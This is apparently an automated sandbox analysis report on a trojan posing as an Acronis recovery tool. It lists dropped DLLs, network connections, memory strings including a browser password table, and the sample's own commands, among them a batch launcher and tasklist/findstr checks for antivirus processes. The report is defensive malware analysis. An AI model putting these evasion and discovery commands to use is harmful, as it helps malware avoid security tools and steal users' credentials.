                Source: 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000003.2224876235.00000000082E0000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000008C55000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                Source: Palestine.com, 00000011.00000003.1515289732.00000000047D3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1515047236.0000000004861000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1859913711.00000000043D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.entrust.net/rpa0
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2536685277.0000000000D5C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2536685277.0000000000D5C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/06
                Source: Palestine.com, 00000011.00000003.1515289732.00000000047D3000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1515047236.0000000004861000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1859913711.00000000043D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: 5RLYIRN4B2NNKHJ11UTSZ2.exe, 00000025.00000003.2033628807.000000007F1EB000.00000004.00001000.00020000.00000000.sdmp, 5RLYIRN4B2NNKHJ11UTSZ2.exe, 00000025.00000003.2023868066.00000000030FF000.00000004.00001000.00020000.00000000.sdmp, 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 00000028.00000000.2044954076.0000000000CF1000.00000020.00000001.01000000.0000000F.sdmp, 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000000.2081536277.0000000000C3D000.00000020.00000001.01000000.00000013.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000045.00000000.2365650084.000000000051D000.00000020.00000001.01000000.00000017.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000000.2427066699.000000000116D000.00000020.00000001.01000000.00000018.sdmpString found in binary or memory: https://www.innosetup.com/
                Source: Palestine.com, 00000011.00000003.1563146921.0000000006A08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.c0yfKF26qNRb
                Source: Palestine.com, 00000011.00000003.1563146921.0000000006A08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.w0HgyL2ZPBj2
                Source: Palestine.com, 00000011.00000003.1563146921.0000000006A08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
                Source: Palestine.com, 00000011.00000003.1563146921.0000000006A08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                Source: Palestine.com, 00000011.00000003.1563146921.0000000006A08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000090C5000.00000004.00001000.00020000.00000000.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.0000000009138000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.openssl.org/H
                Source: 5RLYIRN4B2NNKHJ11UTSZ2.exe, 00000025.00000003.2033628807.000000007F1EB000.00000004.00001000.00020000.00000000.sdmp, 5RLYIRN4B2NNKHJ11UTSZ2.exe, 00000025.00000003.2023868066.00000000030FF000.00000004.00001000.00020000.00000000.sdmp, 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 00000028.00000000.2044954076.0000000000CF1000.00000020.00000001.01000000.0000000F.sdmp, 5RLYIRN4B2NNKHJ11UTSZ2.tmp, 0000002A.00000000.2081536277.0000000000C3D000.00000020.00000001.01000000.00000013.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000045.00000000.2365650084.000000000051D000.00000020.00000001.01000000.00000017.sdmp, V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000000.2427066699.000000000116D000.00000020.00000001.01000000.00000018.sdmpString found in binary or memory: https://www.remobjects.com/ps
                Source: Palestine.com, 00000011.00000003.1563852237.00000000048BA000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1911006209.0000000004435000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                Source: unknownHTTPS traffic detected: 172.67.129.49:443 -> 192.168.2.16:49701 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.129.49:443 -> 192.168.2.16:49702 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.129.49:443 -> 192.168.2.16:49703 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.129.49:443 -> 192.168.2.16:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.129.49:443 -> 192.168.2.16:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.129.49:443 -> 192.168.2.16:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.129.49:443 -> 192.168.2.16:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.129.49:443 -> 192.168.2.16:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.182.135:443 -> 192.168.2.16:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 45.66.248.134:443 -> 192.168.2.16:49710 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.35.89:443 -> 192.168.2.16:49711 version: TLS 1.2
                Source: msn.exe, 00000027.00000002.2194406333.0000000059101000.00000020.00000001.01000000.00000010.sdmpBinary or memory string: DirectDrawCreateExmemstr_e6d5f626-8
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000A671000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: RegisterRawInputDevicesmemstr_2b484035-5

                System Summary

                barindex
                Source: amsi32_4540.amsi.csv, type: OTHERMatched rule: Detects obfuscated PowerShell Code Author: Florian Roth
                Source: Process Memory Space: powershell.exe PID: 4540, type: MEMORYSTRMatched rule: Detects obfuscated PowerShell Code Author: Florian Roth
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.Data.Entity.Design.dllJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\CN.dllJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\mc_dec_aac.dllJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\tipskins.dllJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\contactsUX.dllJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\CloudStorageService.dllJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.SharePoint.BusinessData.Administration.Client.dllJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msncore.dllJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msvcr80.dllJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.NET.Build.Extensions.Tasks.dllJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\NuGet.Build.Tasks.Pack.resources.dllJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\System.ServiceModel.Web.dllJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\WinPixSysMonController.dllJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.VisualStudio.Text.Logic.dllJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\7za.dllJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\clrjit.dllJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\bass.dllJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msn.exeJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\msidcrl40.dllJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.Developer.IdentityService.GitHubProvider.UI.dllJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\FSharp.Core.dllJump to dropped file
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\9ff7d82a-5810-4f5e-88ba-b2b2ee80b456\Microsoft.Build.Tasks.CodeAnalysis.dllJump to dropped file
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeFile created: C:\Windows\ImposedDrivenJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeFile created: C:\Windows\ConstMarketsJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeFile created: C:\Windows\EbonyFaresJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeFile created: C:\Windows\DimensionFullJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeFile created: C:\Windows\PercentageTrademarkJump to behavior
                Source: Microsoft.Developer.IdentityService.GitHubProvider.UI.dll.33.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                Source: V2DDYDPIWYUTCJYUB0IV5.exe.31.drStatic PE information: Number of sections : 11 > 10
                Source: 5RLYIRN4B2NNKHJ11UTSZ2.exe.17.drStatic PE information: Number of sections : 11 > 10
                Source: Microsoft.Build.Tasks.CodeAnalysis.dll.33.drStatic PE information: No import functions for PE file found
                Source: Microsoft.NET.Build.Extensions.Tasks.dll.33.drStatic PE information: No import functions for PE file found
                Source: acronis recovery expert deluxe 1.0.0.132.rarl.exe, 00000001.00000003.1257893310.0000000000752000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs acronis recovery expert deluxe 1.0.0.132.rarl.exe
                Source: acronis recovery expert deluxe 1.0.0.132.rarl.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comProcess created: Commandline size = 10037
                Source: C:\Users\user\AppData\Local\Temp\650429\Palestine.comProcess created: Commandline size = 10037Jump to behavior
                Source: amsi32_4540.amsi.csv, type: OTHERMatched rule: SUSP_Obfuscted_PowerShell_Code date = 2018-12-13, author = Florian Roth, description = Detects obfuscated PowerShell Code, reference = https://twitter.com/silv0123/status/1073072691584880640
                Source: Process Memory Space: powershell.exe PID: 4540, type: MEMORYSTRMatched rule: SUSP_Obfuscted_PowerShell_Code date = 2018-12-13, author = Florian Roth, description = Detects obfuscated PowerShell Code, reference = https://twitter.com/silv0123/status/1073072691584880640
                Source: Microsoft.NET.Build.Extensions.Tasks.dll.33.dr, ResolvePackageFileConflicts.csTask registration methods: 'CreateConflictTaskItem', 'CreateConflictTaskItems'
                Source: Microsoft.Build.Tasks.CodeAnalysis.dll.33.dr, NamedPipeUtil.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: Microsoft.Build.Tasks.CodeAnalysis.dll.33.dr, NamedPipeUtil.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: Microsoft.Build.Tasks.CodeAnalysis.dll.33.dr, BuildServerConnection.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: Microsoft.Build.Tasks.CodeAnalysis.dll.33.dr, BuildServerConnection.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@108/207@6/4
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6420:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6324:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1608:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4136:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6296:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4824:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2816:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1092:120:WilError_03
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeFile created: C:\Users\user\AppData\Local\Temp\nsz1F87.tmpJump to behavior
                Source: acronis recovery expert deluxe 1.0.0.132.rarl.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\AppData\Local\Temp\5RLYIRN4B2NNKHJ11UTSZ2.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\AppData\Local\Temp\is-HT2JP.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\AppData\Local\Temp\is-6GF75.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\AppData\Local\Temp\V2DDYDPIWYUTCJYUB0IV5.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\AppData\Local\Temp\is-BAC82.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: C:\Users\user\AppData\Local\Temp\is-BAC82.tmp\V2DDYDPIWYUTCJYUB0IV5.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                Source: acronis recovery expert deluxe 1.0.0.132.rarl.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.72%
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;WRSA.EXE&apos;
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;OPSSVC.EXE&apos;
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;AVASTUI.EXE&apos;
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;AVGUI.EXE&apos;
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;NSWSCSVC.EXE&apos;
                Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = &apos;SOPHOSHEALTH.EXE&apos;
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\is-I8LOG.tmp\5RLYIRN4B2NNKHJ11UTSZ2.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
                Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.000000000B5CB000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SELECT name FROM sqlite_master WHERE type='table';
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                Source: Palestine.com, 00000011.00000003.1538557719.0000000004863000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1515637752.0000000004865000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1538874374.00000000047A2000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 00000011.00000003.1515922570.00000000047A4000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1883447128.0000000004460000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1883447128.0000000004453000.00000004.00000800.00020000.00000000.sdmp, Palestine.com, 0000001F.00000003.1861429624.0000000004319000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: V2DDYDPIWYUTCJYUB0IV5.tmp, 00000047.00000002.2577166574.00000000091BD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeFile read: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe "C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exe"
                Source: C:\Users\user\Desktop\acronis recovery expert deluxe 1.0.0.132.rarl.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Kill Kill.cmd & Kill.cmd
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 650429
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "GERMANY" False
